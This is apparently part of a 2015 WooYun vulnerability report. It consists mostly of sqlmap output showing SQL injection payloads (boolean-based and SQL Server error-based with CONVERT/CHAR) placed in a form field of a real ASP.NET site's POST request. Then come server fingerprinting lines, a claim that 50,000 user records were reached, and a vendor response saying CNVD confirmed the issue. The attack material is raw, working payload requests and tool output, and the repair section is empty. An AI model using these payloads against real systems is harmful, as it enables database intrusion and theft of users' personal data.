Cr77yJFDIw5Lq/fjMw5Lq/77yI5ZCr77yJFDMw5Lq/fjUw5Lq/77yI5ZCr77yJFTUw5Lq/fjEwMOS6v+
+8iOWQq++8iQwxMDDkur/ku6XkuIoVFwnor7fpgInmi6kCOTkDMTAwAzE0OQMxNTADMTUxAzE1MgMxNT
MDMTU0AzE1NQMxNTYDMTU3AzE1OAMxNTkDMTYwAzE2MQMxNjIDMTYzAzE2NAMxNjUDMTY2AzE2NwMxNj
gUKwMXZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIXDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFRAJ6K
+36YCJ5oupDzEwMOS4h+WPiuS7peS4iwwxMDHvvZ41MDDkuIcLNTAxfjEwMDDkuIcMMTAwMX4zMDAw5L
iHDDMwMDF+NTAwMOS4hxU1MDAx5LiHfjHkur/vvIjlkKvvvIkGMX415Lq/BzZ+MTDkur8IMTF+MzDkur
8IMzF+NTDkur8JNTF+MTAw5Lq/CjEwMX4zMDDkur8KMzAxfjUwMOS6vws1MDF+MTAwMOS6vxAxMDAx5L
q/5Y+K5Lul5LiKFRAJ6K+36YCJ5oupAzEwMQMxMDIDMTY5AzE3MAMxNzEDMTcyAzE3MwMxNzQDMTc1Az
E3NgMxNzcDMTc4AzE3OQMxODADMTgxFCsDEGdnZ2dnZ2dnZ2dnZ2dnZ2dkZAIZDxYCHwFmZAIbDw8WAh
4LUmVjb3JkY291bnRmZGQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAkdodHRwOi8vd3d3LmFjZmljLm
9yZy5jbi9wdWJsaWNmaWxlcy9idXNpbmVzcy9odG1sZmlsZXMvcWdnc2wvaW5kZXguaHRtbBwvdXBsb2
FkLzIwMTEwODMwMzUzMDQwNjUuSlBHZAIBD2QWAmYPFQIWaHR0cDovL3d3dy5jZWVhLmdvdi5jbhwvdX
Bsb2FkLzIwMTEwODMwMzUwMDIxNTcuanBnZAICD2QWAmYPFQIvaHR0cDovL3d3dy5jZXQuY29tLmNuL3
RtbGZpbGVzL3FnZ3NsL2luZGV4Lmh0bWwcL3VwbG9hZC8yMDExMDgzMDM0OTAxMTczLmdpZmQCAw9kFg
JmDxUCLGh0dHA6Ly93d3cuZHJjbmV0LmNvbS5jbi9EUkNOZXQuY2hhbm5lbC53ZWIvHC91cGxvYWQvMj
AxMTA4MzAzNTQyODI4MS5qcGdkAgQPZBYCZg8VAhFodHRwOi8vd3d3LnNtZS5jbhQvdXBsb2FkL2R6c3
dsb2dvLmpwZ2QCBQ9kFgJmDxUCFWh0dHA6Ly93d3cuaHpxeWouY29tLxIvdXBsb2FkL2hhbmdzdy5qcG
dkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBStjdGwwMCRDb250ZW50UGxhY2VIb2
xkZXIxJEwyXzEkSW1hZ2VCdXR0b24xBStjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEwyXzEkSW1hZ2
VCdXR0b24ykM2tZkqK2ZHhlcNyied2YO/1XiYT3+G+4FHMn14UX8k=&ctl00$head1$txtName=&ctl0
0$head1$txtPwd=&ctl00$ContentPlaceHolder1$SelectNew1$TextBox1=&ctl00$ContentPlac
eHolder1$L2_1$RadioButtonList1=944&ctl00$ContentPlaceHolder1$TextBox1=1%' AND 41
31=4131 AND '%'='&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLPrivon
ce=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLCity=-1&ctl00$Cont
entPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLDistrict=-1&ctl00$ContentPlaceHold
er1$DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$Button1=
%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00$ContentPlaceHolder1$DropDownList2=%E8
%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList3=%E8%AF%B7%E9%80
%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList4=%E8%AF%B7%E9%80%89%E6%8B%A9
&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=/wEdAIgB40xJGZXbv/pCOxirg8eB8Jf
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
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMT
kyNTk4MTQ0Mg9kFgJmD2QWAgIDD2QWBgIBD2QWBAIBDw8WAh4EVGV4dAUgMjAxNeW5tDEy5pyIN+aXpS
DmmJ/mnJ/kuIAgIDQ6MzNkZAIDD2QWAgIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQIEMzQ2OV
flhajlm73lt6XllYbogZTlip7lhazljoXlhbPkuo7lvIDlsZXpnZ7lhazmnInliLbnu4/mtY7lj5HlsZ
Xnjq/looPor4Tku7flt6XkvZznmoTpgJrnn6VkAgEPZBYCZg8VAgQzNDYzL+WuieW+veWHuuWPsOmHke
iejeacjeWKoeWunuS9k+e7j+a1jjEy5p2h5paw5pS/ZAICD2QWAmYPFQIEMzQ2MkLlronlvr3nnIHlh7
rlj7DjgIrliqDlv6vosIPnu5PmnoTovazmlrnlvI/kv4PljYfnuqfooYzliqjorqHliJLjgItkAgMPZB
YCZg8VAgQzMzE5LeWFqOWTsua0meS5puiusOWcqOmZleilv+iwg+eglOeahOiusuivneimgeeCuWQCBA
9kFgJmDxUCBDMyNzYu5bm/6KW/MjAxM+W5tOS4reWwj+W+ruS8geS4mui/kOihjOeKtuWGteiwg+eglG
QCAw9kFhQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAgMxNzkn6Z2e5YWs5pyJ5Yi257uP5rWO5Y+R5b
GV546v5aKD6K+E5Lu3Li4uZAIBD2QWAmYPFQIDMTY5J+WFs+S6juOAiua1meaxn+ecgeS8geS4muW3pe
i1hOaUr+S7mC4uLmQCAg9kFgJmDxUCAzEwMRjllYbkvJrlu7rorr7kuJPpopjnm5HmtYtkAgMPZBYCZg
8VAgI5MiHlrojms5Xor5rkv6HkuJPpopjnm5HmtYvosIPmn6XooahkAgQPZBYCZg8VAgI4OB/muZbljJ
fnnIEyMDE05bm056ys5LiJ5a2j5bqmLi4uZAIFD2QWAmYPFQICNzAn5YWz5LqO5b2T5YmN57uP5rWO5b
2i5Yq/5ZKM5LyB5Lia5Y+RLi4uZAIHDw8WBB4CaWQFAzEyMB4EcHRpZAUDNjIxZBYEAgEPDxYCHwAFOe
S9oOefpemBk+S4iuS4quaciOWPrOW8gOeahOS4reWkrue7n+aImOW3peS9nOS8muiuruWQl++8n2RkAg
MPEA8WBh4NRGF0YVRleHRGaWVsZAUHa2V5TmFtZR4ORGF0YVZhbHVlRmllbGQFAmlkHgtfIURhdGFCb3
VuZGdkEBUGCEEu55+l6YGTC0Iu5LiN55+l6YGTGkMu5LiN5YWz5b+D77yM5rKh5pyJ55WZ5oSPKUQu5Z
Cs6K+06L+H77yM5L2G5piv5LiN5riF5qWa5YW35L2T5YaF5a65VkUu6Z2e5bi45YWz5b+D77yM54m55Y
ir5piv5a+55bel5ZWG6IGU5ZKM6Z2e5YWs5pyJ5Yi257uP5rWO5Lq65aOr5o+Q5Ye65LqG5b6I5aSa6K
aB5rGCPkYu5ZCs6K+06L+H77yM5L2G5piv5a+55YaF5a656IO95ZCm5omn6KGM5LiN5oqx5pyJ5aSq5a
Sa5pyf5pybFQYDOTQ0Azk0NQM5NDYDOTQ3Azk0OAM5NDkUKwMGZ2dnZ2dnZGQCCQ8WAh8BAgIWBGYPZB
YCZg8VAgI1NwzkuIrluILlhazlj7hkAgEPZBYCZg8VAgI1OA/pnZ7kuIrluILlhazlj7hkAg0PZBYCZg
9kFgJmD2QWBgIBDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFSENLS3pgInmi6nnnIEtLQnljJfkuqzluI
IG6KW/6JePCeS6keWNl+ecgQnlm5vlt53nnIEJ6LS15bee55yBCea1t+WNl+ecgQnlub/opb/nnIEJ5b
m/5Lic55yBCeemj+W7uuecgQnmsZ/opb/nnIEJ5a6J5b6955yBCea1meaxn+ecgQnmsZ/oi4/nnIEJ5r
mW5Y2X55yBCea5luWMl+ecgQnpnZLmtbfnnIEG5paw55aGBuWugeWkjwnnlJjogoPnnIEJ6ZmV6KW/55
yBCeWxseilv+ecgQnlhoXokpnlj6QJ5rKz5Y2X55yBCeWxseS4nOecgQnmsrPljJfnnIEJ5ZCJ5p6X55
yBCem7kem+meaxnwnovr3lroHnnIEJ5LiK5rW35biCCeWkqea0peW4ggnph43luobluIIY5paw55aG55
Sf5Lqn5bu66K6+5YW15ZuiFSECLTEBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMT
YCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzIUKwMhZ2dnZ2dnZ2
dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgFmZAIDDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFQENLS
3pgInmi6nluIItLRUBAi0xFCsDAWcWAWZkAgUPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVAQ0tLemAie
aLqeWOvy0tFQECLTEUKwMBZ2RkAg8PEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVIAnor7fpgInmi6kG55
S15a2QBuWutueUtR/ova/ku7blkozkv6Hmga/mioDmnK/mnI3liqHkuJogHeiuoeeul+acui/pgJrorq
8v572R57uc6K6+5aSHG+mHkeiejS/pk7booYwv5L+d6ZmpL+ivgeWIuAbmibnlj5EZ5peF5ri45pyN5Y
qhL+aXhea4uOW8gOWPkQnppJDppa7kuJoM5Lqk6YCa6L+Q6L6TM+WqkuS9k++8iOWHuueJiC/lub/mkq
0v5pyJ57q/55S16KeGL+e9kee7nOWqkuS9k++8iRrlub/lkYov5biC5Zy66JCl6ZSAL+WFrOWFsyflqL
HkuZDvvIjnlLXlvbEv6Z+z5LmQL+a4uOaIjy/oibrmnK/vvIkX5bel5Lia5Yi26YCg77yI6Z2eSVTvvI
kU5Yy755aXL+WNq+eUny/kv53lgaUU6Iiq56m6L+iIquWkqS/lhpvlt6UG5rOV5b6LFeaIv+WcsOS6p+
W8gOWPkee7j+iQpQ3mlZnogrIv5Z+56K6tDOWFrOWFseS6i+S4mgzpob7pl67lkqjor6IM5Ye65Zu95p
yN5YqhBuWFtuS7lhjlhpzjgIHmnpfjgIHniafjgIHmuJTkuJoJ5bu6562R5LiaCembtuWUruS4mgrku5
PlgqjkuJogCemCruaUv+S4mgnkvY/lrr/kuJoP5L+h5oGv5Lyg6L6T5LiaDOeJqeS4mueuoeeQhhjnp5
/otYHlkozllYbliqHmnI3liqHkuJoVIAnor7fpgInmi6kCODUCODYDMTI3AzEyOAMxMjkDMTMwAzEzMQ
MxMzIDMTMzAzEzNAMxMzUDMTM2AzEzNwMxMzgDMTM5AzE0MAMxNDEDMTQyAzE0MwMxNDQDMTQ1AzE0Ng
MyMzcDMjM4AzIzOQMyNDADMjQxAzI0MgMyNDMDMjQ0AzI0NRQrAyBnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2
dnZ2dnZ2dnZ2dnZ2RkAhMPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVCgnor7fpgInmi6kMMTAw5Lq65L
ul5LiLDDEwMe+9njUwMOS6ugs1MDF+MTAwMOS6ugwxMDAxfjMwMDDkuroMMzAwMX41MDAw5Lq6DDUwMD
F+ODAwMOS6ugw4MDAxfjHkuIfkuroSMX4y5LiH5Lq677yI5ZCr77yJDTLkuIfkurrku6XkuIoVCgnor7
fpgInmi6kDMTAzAzEwNAMxODIDMTgzAzE4NAMxODUDMTg2AzE4NwMxODgUKwMKZ2dnZ2dnZ2dnZ2RkAh
UPEA8WBh8EBQRuYW1lHwUFAmlkHwZnZBAVFwnor7fpgInmi6kOMjDkuIflj4rku6XkuIsLMjHkuId+NT
DkuIcVNTHkuId+MTAw5LiH77yI5ZCr77yJFjEwMeS4h34zMDDkuIfvvIjlkKvvvIkWMzAx5LiHfjUwMO
S4h++8iOWQq++8iRY1MDHkuId+ODAw5LiH77yI5ZCr77yJDjgwMeS4h34xMDAw5LiHDzEwMDHkuId+Mz
AwMOS4hw8zMDAx5LiHfjUwMDDkuIcPNTAwMeS4h344MDAw5LiHDDgwMDHkuId+MeS6vw4x5Lq/fjLkur
8o5ZCrKRIy5Lq/fjPkur/vvIjlkKvvvIkSM+S6v3415Lq/77yI5ZCr77yJEjXkur9+OOS6v++8iOWQq+
+8iRM45Lq/fjEw5Lq/77yI5ZCr77yJFDEw5Lq/fjE15Lq/77yI5ZCr77yJFDE15Lq/fjIw5Lq/77yI5Z
Cr77yJFDIw5Lq/fjMw5Lq/77yI5ZCr77yJFDMw5Lq/fjUw5Lq/77yI5ZCr77yJFTUw5Lq/fjEwMOS6v+
+8iOWQq++8iQwxMDDkur/ku6XkuIoVFwnor7fpgInmi6kCOTkDMTAwAzE0OQMxNTADMTUxAzE1MgMxNT
MDMTU0AzE1NQMxNTYDMTU3AzE1OAMxNTkDMTYwAzE2MQMxNjIDMTYzAzE2NAMxNjUDMTY2AzE2NwMxNj
gUKwMXZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIXDxAPFgYfBAUEbmFtZR8FBQJpZB8GZ2QQFRAJ6K
+36YCJ5oupDzEwMOS4h+WPiuS7peS4iwwxMDHvvZ41MDDkuIcLNTAxfjEwMDDkuIcMMTAwMX4zMDAw5L
iHDDMwMDF+NTAwMOS4hxU1MDAx5LiHfjHkur/vvIjlkKvvvIkGMX415Lq/BzZ+MTDkur8IMTF+MzDkur
8IMzF+NTDkur8JNTF+MTAw5Lq/CjEwMX4zMDDkur8KMzAxfjUwMOS6vws1MDF+MTAwMOS6vxAxMDAx5L
q/5Y+K5Lul5LiKFRAJ6K+36YCJ5oupAzEwMQMxMDIDMTY5AzE3MAMxNzEDMTcyAzE3MwMxNzQDMTc1Az
E3NgMxNzcDMTc4AzE3OQMxODADMTgxFCsDEGdnZ2dnZ2dnZ2dnZ2dnZ2dkZAIZDxYCHwFmZAIbDw8WAh
4LUmVjb3JkY291bnRmZGQCBQ9kFgICAQ8WAh8BAgYWDGYPZBYCZg8VAkdodHRwOi8vd3d3LmFjZmljLm
9yZy5jbi9wdWJsaWNmaWxlcy9idXNpbmVzcy9odG1sZmlsZXMvcWdnc2wvaW5kZXguaHRtbBwvdXBsb2
FkLzIwMTEwODMwMzUzMDQwNjUuSlBHZAIBD2QWAmYPFQIWaHR0cDovL3d3dy5jZWVhLmdvdi5jbhwvdX
Bsb2FkLzIwMTEwODMwMzUwMDIxNTcuanBnZAICD2QWAmYPFQIvaHR0cDovL3d3dy5jZXQuY29tLmNuL3
RtbGZpbGVzL3FnZ3NsL2luZGV4Lmh0bWwcL3VwbG9hZC8yMDExMDgzMDM0OTAxMTczLmdpZmQCAw9kFg
JmDxUCLGh0dHA6Ly93d3cuZHJjbmV0LmNvbS5jbi9EUkNOZXQuY2hhbm5lbC53ZWIvHC91cGxvYWQvMj
AxMTA4MzAzNTQyODI4MS5qcGdkAgQPZBYCZg8VAhFodHRwOi8vd3d3LnNtZS5jbhQvdXBsb2FkL2R6c3
dsb2dvLmpwZ2QCBQ9kFgJmDxUCFWh0dHA6Ly93d3cuaHpxeWouY29tLxIvdXBsb2FkL2hhbmdzdy5qcG
dkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBStjdGwwMCRDb250ZW50UGxhY2VIb2
xkZXIxJEwyXzEkSW1hZ2VCdXR0b24xBStjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEwyXzEkSW1hZ2
VCdXR0b24ykM2tZkqK2ZHhlcNyied2YO/1XiYT3+G+4FHMn14UX8k=&ctl00$head1$txtName=&ctl0
0$head1$txtPwd=&ctl00$ContentPlaceHolder1$SelectNew1$TextBox1=&ctl00$ContentPlac
eHolder1$L2_1$RadioButtonList1=944&ctl00$ContentPlaceHolder1$TextBox1=1%' AND 85
96=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT
(CASE WHEN (8596=8596) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHA
R(120)+CHAR(113)+CHAR(113))) AND '%'='&ctl00$ContentPlaceHolder1$WUC_SelectPrivo
nceAndCity1$DDLPrivonce=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$
DDLCity=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLDistrict=-1&c
tl00$ContentPlaceHolder1$DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$Content
PlaceHolder1$Button1=%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00$ContentPlaceHold
er1$DropDownList2=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDown
List3=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList4=%E8%AF
%B7%E9%80%89%E6%8B%A9&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=/wEdAIgB40
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
---
[04:36:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

数据库:

数据库.png


5万用户信息:

用户表.png

修复方案:

@@

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-11 16:27

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无